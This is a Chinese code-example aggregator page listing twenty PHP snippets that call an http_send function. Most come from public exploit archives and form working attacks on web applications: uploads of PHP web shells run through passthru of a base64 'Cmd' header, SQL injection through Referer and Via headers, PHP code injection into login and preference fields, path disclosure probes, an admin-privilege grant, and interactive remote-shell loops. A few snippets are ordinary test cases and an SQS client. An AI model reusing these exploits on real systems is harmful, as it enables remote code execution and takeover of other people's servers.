本文整理汇总了PHP中http_send函数的典型用法代码示例。如果您正苦于以下问题:PHP http_send函数的具体用法?PHP http_send怎么用?PHP http_send使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了http_send函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的PHP代码示例。
示例1: upload
/**
 * Upload step of an archived public proof-of-concept (listed source: 5922.php).
 *
 * For each extension in $file_ext it POSTs a multipart form to an FCKeditor
 * "mcpuk" file-manager connector with a file named sh.php.<ext>, then requests
 * {$path}sh.php.<ext> and checks whether the body was run as PHP instead of
 * being served as text. Uses the globals $host and $path and the script's own
 * http_send(), which is not part of this excerpt.
 *
 * Defender view: the request carries no cookie or credentials, and the file
 * name keeps ".php" in front of an innocuous suffix. Remove or access-control
 * bundled editor connectors, validate the whole file name rather than only the
 * last suffix, store uploads where the web server does not execute scripts,
 * and alert on upload requests whose file name contains ".php." or on requests
 * carrying a "Cmd" header (the uploaded body reads $_SERVER[HTTP_CMD]).
 *
 * @return string|false Extension whose upload came back executed, or false if none did.
 */
function upload()
{
global $host, $path;
$connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php";
// Suffixes tried after ".php"; presumably ones the connector accepts - not verifiable from this excerpt.
$file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext) {
print "\n[-] Trying to upload with .{$ext} extension...";
// Hand-built multipart/form-data body with the fixed boundary "12345".
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
// The response is expected to hold an OnUploadCompleted(code,'message') callback;
// codes 0 and 201 are the ones this script accepts.
preg_match("/OnUploadCompleted\\((.*),'(.*)'\\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) {
die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
}
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
// "print" absent but "_code_" present means the source text was not echoed back
// while its output was. eregi() was removed in PHP 7.0, so this runs on PHP 5 only.
if (!eregi("print", $html) and eregi("_code_", $html)) {
return $ext;
}
// One-second pause between attempts.
sleep(1);
}
return false;
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:33,代码来源:5922.php
示例2: execute
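/**
 * Test case: post a sample log upload to the ulog endpoint and expect {"errno":0}.
 *
 * The request fields are built as an array. The original decoded them from a
 * JSON literal in which the dirname(__FILE__) concatenation sat inside the
 * quotes, so the text was not valid JSON, json_decode() returned null and no
 * fields were sent.
 *
 * NOTE(review): the leading "@" in 'datafile' looks like the legacy cURL
 * file-upload prefix; http_send() is not visible here, so confirm how it treats
 * the value. That prefix makes cURL read any local path it is given, so it must
 * never be applied to values that come from a request.
 * NOTE(review): the endpoint is a hard-coded private address; the test only
 * passes inside that network.
 */
protected function execute()
{
    $postParam = array(
        'ver' => '2',
        'pd' => 'map',
        'im' => '2',
        'os' => 'android',
        // Sample file expected next to this test case.
        'datafile' => '@' . dirname(__FILE__)
            . '/20130913100335_861133029533301_XOoGY2L6NDvVw_E3BUS2pe8lB2Lur+3aL7AaN8LHXakeM_2.dat',
    );
    $data = http_send("http://10.99.33.39:8202/ulog/public/up.php", $postParam);
    $res = "{\"errno\":0}";
    $this->assert_json(__LINE__, $data, $res);
}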
开发者ID:sdgdsffdsfff,项目名称:stplatform,代码行数:8,代码来源:case_1411824180.php
示例3: execute
/**
 * Test case: post a sample log upload (absolute path on the test host) to the
 * ulog endpoint and expect {"errno":0}.
 *
 * NOTE(review): the leading "@" in "datafile" looks like the legacy cURL
 * file-upload prefix; http_send() is not visible here, so confirm how it treats
 * the value.
 */
protected function execute()
{
    // Same JSON text as before, single-quoted so the inner quotes need no escaping.
    $requestJson = '{"ver":"2","pd":"map","im":"2","os":"android","datafile":"@/home/map/apps/servertest/lighttpd/htdocs/mysite/application/controllers/20130913100335_861133029533301_XOoGY2L6NDvVw_E3BUS2pe8lB2Lur+3aL7AaN8LHXakeM_2.dat"}';
    $fields = json_decode($requestJson, true);
    $response = http_send('http://10.99.33.39:8202/ulog/public/up.php', $fields);
    $this->assert_json(__LINE__, $response, '{"errno":0}');
}
开发者ID:sdgdsffdsfff,项目名称:stplatform,代码行数:8,代码来源:case_1411823716.php
示例4: execute
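/**
 * Test case: post the sample file 20130913100335.dat (next to this test) to the
 * ulog endpoint and expect {"errno":0}.
 *
 * The fields are built as an array instead of being spliced into a JSON string
 * and decoded again: a directory name containing a backslash or a double quote
 * (for example a Windows path) made the JSON invalid, json_decode() returned
 * null and the request went out without fields.
 *
 * NOTE(review): the leading "@" in 'datafile' looks like the legacy cURL
 * file-upload prefix; http_send() is not visible here, so confirm how it treats
 * the value.
 */
protected function execute()
{
    $postParam = array(
        'ver' => '2',
        'pd' => 'map',
        'im' => '2',
        'os' => 'android',
        'datafile' => '@' . dirname(__FILE__) . '/20130913100335.dat',
    );
    $data = http_send("http://10.99.33.39:8202/ulog/public/up.php", $postParam);
    $res = "{\"errno\":0}";
    $this->assert_json(__LINE__, $data, $res);
}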
开发者ID:sdgdsffdsfff,项目名称:stplatform,代码行数:8,代码来源:case_1415104050.php
示例5: check_query
/**
 * Helper from an archived public proof-of-concept (listed source: 4798.php):
 * sends one GET request whose Referer header is the caller-supplied string and
 * reports whether the response contains the text "DENIED".
 *
 * Uses the globals $host and $path and the script's own http_send(), which is
 * not part of this excerpt.
 *
 * Defender view: the parameter name suggests the target places the Referer
 * value into a SQL statement (not verifiable from this excerpt). Request
 * headers are client-controlled like any other input: bind them as query
 * parameters when they are stored or looked up, and treat SQL keywords or
 * comment markers in Referer as a detection signal.
 *
 * @param string $sql Text placed verbatim in the Referer header.
 * @return bool True when "DENIED" appears in the response.
 */
function check_query($sql)
{
global $host, $path;
$packet = "GET {$path} HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$sql} \r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n\r\n";
$html = http_send($host, $packet);
return preg_match("/DENIED/", $html) ? true : false;
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:11,代码来源:4798.php
示例6: get_path
/**
 * Helper from an archived public proof-of-concept (listed source: 19573.php):
 * requests tiki-rss_error.php directly and extracts the text between "in <b>"
 * and "tiki-rss" from the response, i.e. the directory part of a PHP error
 * message that names the script's location on disk.
 *
 * Uses the globals $host and $path and the script's own http_send(), which is
 * not part of this excerpt. Terminates the script when the pattern is absent.
 *
 * Defender view: this is full-path disclosure through displayed PHP errors.
 * Turn display_errors off in production, log errors server-side instead, and
 * deny direct HTTP access to files that are only meant to be included.
 *
 * @return string Path prefix captured from the error message.
 */
function get_path()
{
global $host, $path;
$packet = "GET {$path}tiki-rss_error.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
if (!preg_match('/in <b>(.*)tiki-rss/', http_send($host, $packet), $m)) {
die("\n[-] Path not found!\n");
}
return $m[1];
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:11,代码来源:19573.php
示例7: get_path
/**
 * Helper from an archived public proof-of-concept (listed source: 4879.php):
 * requests ../doceboCore/class/class.conf_fw.php directly, reads the file path
 * that a PHP error message prints between "in <b>" and "</b> on", cuts it at
 * the first occurrence of "docebo", and appends $path without its first
 * character.
 *
 * Uses the globals $host and $path and the script's own http_send(), which is
 * not part of this excerpt. There is no check that the pattern matched.
 *
 * Defender view: this is full-path disclosure through displayed PHP errors on a
 * class file that is reachable over HTTP. Turn display_errors off in
 * production and keep include-only files outside the document root or deny
 * direct requests to them.
 *
 * @return string Path assembled from the disclosed prefix and $path.
 */
function get_path()
{
global $host, $path;
$packet = "GET {$path}../doceboCore/class/class.conf_fw.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
preg_match("/in <b>(.*)<\\/b> on/i", http_send($host, $packet), $found);
// Keep only what precedes "docebo" in the captured path.
$ret = substr($found[1], 0, strlen($found[1]) - strlen(strstr($found[1], "docebo")));
// Append $path minus its leading character.
$ret .= substr($path, 1);
return $ret;
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:11,代码来源:4879.php
示例8: sqs_client_enqueue
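/**
 * Send one message to an Amazon SQS queue with a signed POST request.
 *
 * $data is JSON-encoded into MessageBody. The request is signed by
 * __sqs_client_version_four() and sent with http_send(); both are defined
 * elsewhere in the project, as are log_file() and DATE_FORMAT_ISO8601_BASIC.
 *
 * Changes against the listed version: the response is parsed without
 * LIBXML_NOENT (entity substitution is what enables XML external entity
 * expansion, and a SendMessage response needs none) and with LIBXML_NONET;
 * a body that cannot be JSON-encoded or a queue URL without a host is reported
 * as an error instead of being sent.
 *
 * @param mixed $data   Payload to enqueue.
 * @param array $config Reads sqs_queue_url, aws_access_key_id, aws_secret_access_key,
 *                      s3_region, sqs_region and log_api_response.
 * @return array 'id' holds the MessageId on success; 'error' holds a message on failure.
 */
function sqs_client_enqueue($data, $config)
{
    $result = array();
    $err = '';

    $message_body = json_encode($data);
    if ($message_body === false) {
        return array('error' => 'Could not encode sqs message body');
    }
    $parsed_url = parse_url($config['sqs_queue_url']);
    if (!is_array($parsed_url) || empty($parsed_url['host'])) {
        return array('error' => 'Could not parse sqs queue url ' . $config['sqs_queue_url']);
    }

    $variables = array();
    $variables['Action'] = 'SendMessage';
    $variables['MessageBody'] = $message_body;
    $variables['Version'] = '2012-11-05';

    $headers = array();
    $headers['Host'] = strtolower($parsed_url['host']);
    $headers['X-Amz-Date'] = gmdate(DATE_FORMAT_ISO8601_BASIC);

    // NOTE(review): the signer receives s3_region while the credential scope below
    // prefers sqs_region. If the two differ, or s3_region is empty, the scope in the
    // Authorization header may not be the one that was signed - confirm against
    // __sqs_client_version_four(), which is not visible here.
    $signature = __sqs_client_version_four($config['aws_secret_access_key'], $config['sqs_queue_url'], $variables, $headers, $config['s3_region'], 'post');

    // Queue region, falling back to the S3 bucket's region and then to us-east-1.
    if (!empty($config['sqs_region'])) {
        $region = $config['sqs_region'];
    } elseif (!empty($config['s3_region'])) {
        $region = $config['s3_region'];
    } else {
        $region = 'us-east-1';
    }
    // The credential scope uses the date part (YYYYMMDD) of X-Amz-Date.
    $date_str = substr($headers['X-Amz-Date'], 0, 8);
    $headers['Authorization'] = "AWS4-HMAC-SHA256 Credential={$config['aws_access_key_id']}/{$date_str}/{$region}/sqs/aws4_request, SignedHeaders=host;x-amz-date, Signature={$signature}";

    $post_result = http_send($config['sqs_queue_url'], $variables, $headers);
    $response_body = $post_result['result'];
    $log_responses = !empty($config['log_api_response']);
    if ($response_body && $log_responses) {
        log_file("sqs response:\n" . print_r($response_body, true), $config);
    }

    if ($post_result['error']) {
        $err = 'Could not make sqs request ' . $config['sqs_queue_url'] . ' ' . $post_result['error'];
    } elseif (!$response_body) {
        $err = 'Got no response from sqs request';
    } else {
        // Collect parser errors internally instead of silencing them with "@",
        // then restore the caller's libxml error mode.
        $previous_mode = libxml_use_internal_errors(true);
        $xml = simplexml_load_string($response_body, 'SimpleXMLElement', LIBXML_NOCDATA | LIBXML_NONET);
        libxml_clear_errors();
        libxml_use_internal_errors($previous_mode);

        if (!is_object($xml)) {
            $err = 'Could not parse sqs response';
        } elseif (count($xml->Error)) {
            // Always keep the body of an error response, even when response logging is off.
            if (!$log_responses) {
                log_file("sqs response:\n" . $response_body, $config);
            }
            $err = 'Got error in sqs response';
        } elseif (!(is_object($xml->SendMessageResult) && is_object($xml->SendMessageResult->MessageId))) {
            $err = 'Got no MessageId in sqs response';
        } else {
            $result['id'] = (string) $xml->SendMessageResult->MessageId;
        }
    }

    if ($err) {
        $result['error'] = $err;
    }
    return $result;
}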
开发者ID:joshuacox,项目名称:angular-moviemasher,代码行数:52,代码来源:sqs.php
示例9: check_query
/**
 * Helper from an archived public proof-of-concept (listed source: 5391.php):
 * submits a guestbook entry whose Via header is the caller-supplied string and
 * reports whether the literal text UNION, comment, SELECT is absent from the
 * response.
 *
 * Uses the globals $host and $path and the script's own http_send(), which is
 * not part of this excerpt.
 *
 * Defender view: the parameter name suggests the target places the Via value
 * into a SQL statement and echoes the statement back when it fails (neither is
 * verifiable from this excerpt). Proxy-related headers such as Via are
 * client-controlled: bind them as query parameters, do not show database errors
 * to clients, and treat SQL keywords in these headers as a detection signal.
 *
 * @param string $sql Text placed verbatim in the Via header.
 * @return bool True when the response does not contain the pattern.
 */
function check_query($sql)
{
global $host, $path;
$payload = "gb_name=null&gb_email=foo%40bar.com&task=insert";
$packet = "POST {$path}index.php?option=guestbook HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Via: {$sql}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
return !preg_match("/UNION\\/\\*\\*\\/SELECT/", http_send($host, $packet));
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:13,代码来源:5391.php
示例10: inject_code
/**
 * Step from an archived public proof-of-concept (listed source: 8649.php):
 * submits the admin login form with PHP source text in the p_user field and an
 * empty password. The response is discarded.
 *
 * Uses the globals $host and $path and the script's own http_send(), which is
 * not part of this excerpt.
 *
 * Defender view: a step like this only matters if the application later stores
 * the submitted user name somewhere that is interpreted as PHP, for example a
 * failed-login log under the document root (presumed; the excerpt does not show
 * where the value ends up). Write logs outside the web root in a file type the
 * server never executes, encode request data before storing it, and alert on
 * PHP open tags in form fields and on requests carrying a "Cmd" header.
 *
 * @return void
 */
function inject_code()
{
global $host, $path;
$code = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die} ?>";
$payload = "p_user={$code}&p_pass=";
$packet = "POST {$path}admin/index.php?action=login HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
http_send($host, $packet);
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:13,代码来源:8649.php
示例11: inject_php
/**
 * Step from an archived public proof-of-concept (listed source: 17911.php):
 * posts to set-prefs.php, authenticated by the user_name and user_password_hash
 * cookies, with a feed_order value that closes an enclosing PHP expression and
 * appends statements of its own. Terminates the script if the response mentions
 * login.php, which it reads as a rejected login.
 *
 * Uses the globals $host, $path, $user and $pass and the script's own
 * http_send(), which is not part of this excerpt.
 *
 * Defender view: the value is shaped to break out of generated PHP code, so the
 * application presumably writes preferences into PHP source or evaluates them
 * (not verifiable from this excerpt). Persist preferences as data (database
 * rows or JSON) rather than generated code, validate feed_order against the
 * expected format, and note that a cookie holding a password hash lets anyone
 * who obtains the hash authenticate without knowing the password.
 *
 * @return void
 */
function inject_php()
{
global $host, $path, $user, $pass;
$data = "feed_order=\"]));}print('<<');passthru(base64_decode(\$_SERVER[HTTP_CMD]));print('>>');%23";
$packet = "POST {$path}set-prefs.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: user_name={$user}; user_password_hash={$pass}\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
if (preg_match("/login.php/", http_send($host, $packet))) {
die("\n[-] Incorrect username or password!\n");
}
}
开发者ID:sasukeuni,项目名称:Python-Exploit-Search-Tool,代码行数:15,代码来源:17911.php
示例12: login
/**
 * Login step from an archived public proof-of-concept (listed source: 5653.php):
 * posts $username and $password to index.php?a=login and checks whether the
 * response contains "pass=" followed by the MD5 hex digest of the password.
 *
 * Uses the globals $host, $path, $username and $password and the script's own
 * http_send(), which is not part of this excerpt. The credentials are placed in
 * the form body without URL-encoding.
 *
 * Defender view: the success check implies the application sends back an
 * unsalted MD5 of the password, most likely in a cookie (not verifiable from
 * this excerpt). A session should be an opaque random identifier; passwords
 * belong in password_hash() output that never leaves the server.
 *
 * @return int|false Result of preg_match(): 1 on match, 0 on no match, false on error.
 */
function login()
{
global $host, $path, $username, $password;
$data = "user={$username}&pass={$password}&submit=1&request_uri=foo";
$packet = "POST {$path}index.php?a=login HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
$pattern = "/pass=" . md5($password) . "/";
return preg_match($pattern, http_send($host, $packet));
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:13,代码来源:5653.php
示例13: check_target
/**
 * Probe from an archived public proof-of-concept (listed source: 6005.php):
 * requests slideshow_full.php with a single quote (%27) as album_name and looks
 * for "FROM <something>_m" in the response. On a match the captured text is
 * stored in the global $prefix; otherwise the script terminates.
 *
 * Uses the globals $host, $path and $prefix and the script's own http_send(),
 * which is not part of this excerpt.
 *
 * Defender view: the probe works only when a lone quote breaks the query and
 * the database error, including the failing statement, is shown to the client.
 * Bind album_name as a query parameter and keep database errors out of
 * responses; the script's own message points out that magic_quotes_gpc, a
 * setting removed in PHP 5.4, was the only thing standing in the way.
 *
 * @return void
 */
function check_target()
{
global $host, $path, $prefix;
print "\n[-] Checking {$host}...";
$packet = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) {
print "vulnerable!\n";
} else {
die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n");
}
// Text between "FROM " and "_m" in the echoed statement; presumably the table prefix.
$prefix = $match[1];
}
开发者ID:iusky,项目名称:fullypwnd,代码行数:14,代码来源:6005.php
示例14: check_target
/**
 * Probe from an archived public proof-of-concept (listed source: 4242.php):
 * requests new_images.php with a subquery in the "order" parameter and treats
 * the presence of "The LinPHA developers" in the response as a sign that the
 * page rendered normally. Terminates the script otherwise.
 *
 * Uses the globals $host and $path and the script's own http_send(), which is
 * not part of this excerpt.
 *
 * Defender view: the "order" parameter evidently reaches an ORDER BY clause
 * unfiltered. Sort columns cannot be bound as parameters, so map the request
 * value onto a fixed allow-list of column names, and treat parentheses or SQL
 * keywords in sort parameters as a detection signal.
 *
 * @return void
 */
function check_target()
{
// see if MySQL version is >= 4.1 (subqueries support) or other error
global $host, $path;
print "\n[-] Checking {$host}...";
$pck = "GET " . $path . "new_images.php?order=id,(SELECT/**/1) HTTP/1.1\r\n";
$pck .= "Host: " . $host . "\r\n";
$pck .= "Keep-Alive: 300\r\n";
$pck .= "Connection: keep-alive\r\n\r\n";
$buff = http_send($host, $pck);
if (!strpos($buff, "The LinPHA developers")) {
die("\n\n[-] Error... Probably wrong MySQL version!\n");
} else {
print " OK!\n";
}
}
开发者ID:sasukeuni,项目名称:Python-Exploit-Search-Tool,代码行数:16,代码来源:4242.php
示例15: strlen
print "\n+------------------------------------------------------------+\n";
if ($argc < 5) {
print "\nUsage......: php {$argv['0']} <host> <path> <username> <password>\n";
print "\nExample....: php {$argv['0']} localhost / user pass";
print "\nExample....: php {$argv['0']} localhost /dolphin/ user pass\n";
die;
}
$host = $argv[1];
$path = $argv[2];
$payload = "ID={$argv[3]}&Password={$argv[4]}";
$packet = "POST {$path}member.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
if (!preg_match("/memberID=([0-9]+).*memberPassword=([0-9a-f]+)/is", http_send($host, $packet), $m)) {
die("\n[-] Login failed!\n");
}
$phpcode = "1);error_reporting(0);passthru(base64_decode(\$_SERVER[HTTP_CMD])";
$packet = "GET {$path}member_menu_queries.php?action=get_bubbles_values&bubbles=Friends:{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: memberID={$m[1]}; memberPassword={$m[2]}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while (1) {
print "\ndolphin-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") {
break;
}
preg_match("/\r\n\r\n(.*)\\{\"Friends/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
开发者ID:sasukeuni,项目名称:Python-Exploit-Search-Tool,代码行数:31,代码来源:17994.php
示例16: random_mkdir
/**
 * Step from an archived public proof-of-concept (listed source: 18111.php):
 * asks the file manager's ajax_create_folder.php to create a folder with a
 * uniqid() name and returns that name. The response is not checked.
 *
 * Uses the globals $host, $path, $fileman and $rootdir and the script's own
 * http_send(), which is not part of this excerpt.
 *
 * Defender view: the request carries no cookie or credentials, so the folder
 * endpoint of the bundled file manager is being called unauthenticated. Put
 * such helper endpoints behind the application's session check or remove them,
 * and alert on direct requests to file-manager ajax_* scripts.
 *
 * NOTE(review): the "¤" in $payload looks like an artifact of this page's
 * extraction; the listing is not faithful to the original file at that point.
 *
 * @return string Generated folder name.
 */
function random_mkdir()
{
global $host, $path, $fileman, $rootdir;
$dirname = uniqid();
$payload = "new_folder={$dirname}¤tFolderPath={$rootdir}";
$packet = "POST {$path}{$fileman}/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
return $dirname;
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:13,代码来源:18111.php
示例17: stream_get_contents
return stream_get_contents($sock);
}
print "\n+-----------------------------------------------------+";
print "\n| aidiCMS v3.55 Remote Code Execution Exploit by EgiX |";
print "\n+-----------------------------------------------------+\n";
if ($argc < 3) {
print "\nUsage......: php {$argv['0']} <host> <path>\n";
print "\nExample....: php {$argv['0']} localhost /";
print "\nExample....: php {$argv['0']} localhost /aidicms/\n";
die;
}
$host = $argv[1];
$path = $argv[2];
$payload = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
$packet = "POST {$path}modul/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet = "GET {$path}modul/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while (1) {
print "\naidicms-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") {
break;
}
preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
开发者ID:sasukeuni,项目名称:Python-Exploit-Search-Tool,代码行数:31,代码来源:18085.php
示例18: strlen
$headers .= "Content-Length: " . strlen($payload) . "\r\n\r\n";
$headers .= $payload;
fclose(http_send($host, 80, $headers));
sleep(2);
print "Granting admin privileges for user [ {$newuser} ]\n";
$headers = "GET {$path}admin/review/staff/index.php HTTP/1.0\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n";
$headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n\r\n";
preg_match_all('/php\\?u=(\\d+)/', http_recv(http_send($host, 80, $headers)), $matches);
if (!is_numeric(max($matches[1]))) {
die('Failed.');
}
sleep(2);
$payload = "rdo_type=staff&name=1&surname=2&email=3&password={$newpass}&chk_admin=on&save=" . urlencode('Save Changes');
$headers = "POST {$path}admin/edit/index.php?u=" . max($matches[1]) . " HTTP/1.0\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n";
$headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n";
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: " . strlen($payload) . "\r\n\r\n";
$headers .= $payload;
fclose(http_send($host, 80, $headers));
print "Success!\n\n";
print "http://{$host}{$path}login.php\n";
print "user: {$newuser}\n";
print "pass: {$newpass}\n";
?>
#
### [ dun / 2012 ] ###############################
开发者ID:sasukeuni,项目名称:Python-Exploit-Search-Tool,代码行数:30,代码来源:20762.php
示例19: set_NowritableServer
/**
 * Step from an archived public proof-of-concept (listed source: 4513.php):
 * loads the admin preferences page with the pass_cookie cookie and, if the page
 * contains either of two phrases (Italian or English) about writing files on
 * the server, posts change_mode=1 to admin.php.
 *
 * Uses the globals $host, $path, $prefix and $pwd and the script's own
 * http_send(), which is not part of this excerpt.
 *
 * Defender view: the first request is authorised by nothing more than a cookie
 * carrying the password value, and the mode-changing POST is sent with no
 * Cookie header at all. Use server-side sessions with random identifiers,
 * require an authenticated session and an anti-CSRF token on every
 * state-changing admin request, and log changes to operating-mode settings.
 *
 * @return void
 */
function set_NowritableServer()
{
global $host, $path, $prefix, $pwd;
// we need to set $NowritableServer=1 in /option/php-stats_mode.php
$s1 = "/con scrittura di files sul Server/";
$s2 = "/the write files on server mode/";
$pck = "GET {$path}admin.php?action=preferenze HTTP/1.1\r\n";
$pck .= "Host: {$host}\r\n";
$pck .= "Cookie: pass_cookie={$pwd}\r\n";
$pck .= "Keep-Alive: 300\r\n";
$pck .= "Connection: keep-alive\r\n\r\n";
$html = http_send($host, $pck);
// Only send the change when the preferences page shows one of the two phrases.
if (preg_match($s1, $html) || preg_match($s2, $html)) {
$data = "change_mode=1";
$pck = "POST {$path}admin.php HTTP/1.1\r\n";
$pck .= "Host: {$host}\r\n";
$pck .= "Content-Type: application/x-www-form-urlencoded\r\n";
$pck .= "Content-Length: " . strlen($data) . "\r\n";
$pck .= "Keep-Alive: 300\r\n";
$pck .= "Connection: keep-alive\r\n\r\n";
$pck .= $data;
http_send($host, $pck);
}
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:24,代码来源:4513.php
示例20: preg_match
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) {
die("\n[-] Upload failed! (Error {$html[1]})\n");
} else {
print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
}
define(STDIN, fopen("php://stdin", "r"));
while (1) {
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit") {
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: " . base64_encode($cmd) . "\r\n";
$packet .= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) {
die("\n[-] Exploit failed...\n");
}
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
} else {
break;
}
}
?>
# milw0rm.com [2008-05-29]
开发者ID:noscripter,项目名称:exploit-database,代码行数:30,代码来源:5697.php
注:本文中的http_send函数示例整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。 |